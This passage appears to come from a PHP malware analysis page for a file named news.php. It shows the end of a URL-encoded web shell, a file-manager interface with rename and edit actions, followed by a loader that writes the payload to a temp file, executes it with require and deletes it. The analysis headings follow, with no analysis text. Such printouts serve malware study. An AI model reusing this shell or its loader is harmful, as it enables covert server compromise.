09%09%3Coption%20value%3D%5C%22rename%5C%22%3ERename%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22edit%5C%22%3EEdit%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%3C%2Fselect%3E%0A%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22type%5C%22%20value%3D%5C%22file%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22name%5C%22%20value%3D%5C%22%24file%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22path%5C%22%20value%3D%5C%22%24path%2F%24file%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22submit%5C%22%20value%3D%5C%22%3E%3E%5C%22%20%2F%3E%0A%09%09%09%09%09%09%09%09%3C%2Fform%3E%0A%09%09%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%22%3B%7Decho%20%27%0A%09%09%09%09%3C%2Ftable%3E%0A%09%09%09%3C%2Fdiv%3E%27%3B%7D%3F%3E%0A%0A%0A%09%09%09%3Cbr%3E%0A%09%09%09%0A%09%09%09%3Cdiv%20class%3D%22footer%22%3EHit%20me%20%5Bat%5D%20%3Cfont%20color%3D%22red%22%3Ezhieend%40gmail.com%3C%2Ffont%3E%3C%2Fdiv%3E%0A%09%09%0A%09%09%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp%0A%20function%20perms%28%24file%29%7B%24perms%3Dfileperms%28%24file%29%3Bif%28%28%24perms%260xC000%29%3D%3D0xC000%29%7B%24info%3D%27s%27%3B%7Delseif%28%28%24perms%260xA000%29%3D%3D0xA000%29%7B%24info%3D%27l%27%3B%7Delseif%28%28%24perms%260x8000%29%3D%3D0x8000%29%7B%24info%3D%27-%27%3B%7Delseif%28%28%24perms%260x6000%29%3D%3D0x6000%29%7B%24info%3D%27b%27%3B%7Delseif%28%28%24perms%260x4000%29%3D%3D0x4000%29%7B%24info%3D%27d%27%3B%7Delseif%28%28%24perms%260x2000%29%3D%3D0x2000%29%7B%24info%3D%27c%27%3B%7Delseif%28%28%24perms%260x1000%29%3D%3D0x1000%29%7B%24info%3D%27p%27%3B%7Delse%20%7B%24info%3D%27u%27%3B%7D%24info.%3D%28%28%24perms%260x0100%29%3F%27r%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0080%29%3F%27w%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0040%29%3F%28%28%24perms%260x0800%29%3F%27s%27%3A%27x%27%29%3A%28%28%24perms%260x0800%29%3F%27S%27%3A%27-%27%29%29%3B%24info.%3D%28%28%24perms%260x0020%29%3F%27r%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0010%29%3F%27w%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0008%29%3F%28%28%24perms%260x0400%29%3F%27s%27%3A%27x%27%29%3A%28%28%24perms%260x0400%29%3F%27S%27%3A%27-%27%29%29%3B%24info.%3D%28%28%24perms%260x0004%29%3F%27r%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0002%29%3F%27w%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0001%29%3F%28%28%24perms%260x0200%29%3F%27t%27%3A%27x%27%29%3A%28%28%24perms%260x0200%29%3F%27T%27%3A%27-%27%29%29%3Breturn%20%24info%3B%7D%3F%3E");

   function x($i)
   {
       $t = tempnam("/tmp", "0");
       $h = fopen($t, "w+");
       fwrite($h, $i);
       fclose($h);
       require $t;
       unlink($t);
       return get_defined_vars();
   }
   extract(x($i));
?>
PHP Malware Analysis

news.php

md5: d4bfd4127e4be5a0ededdecebfdbef10

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
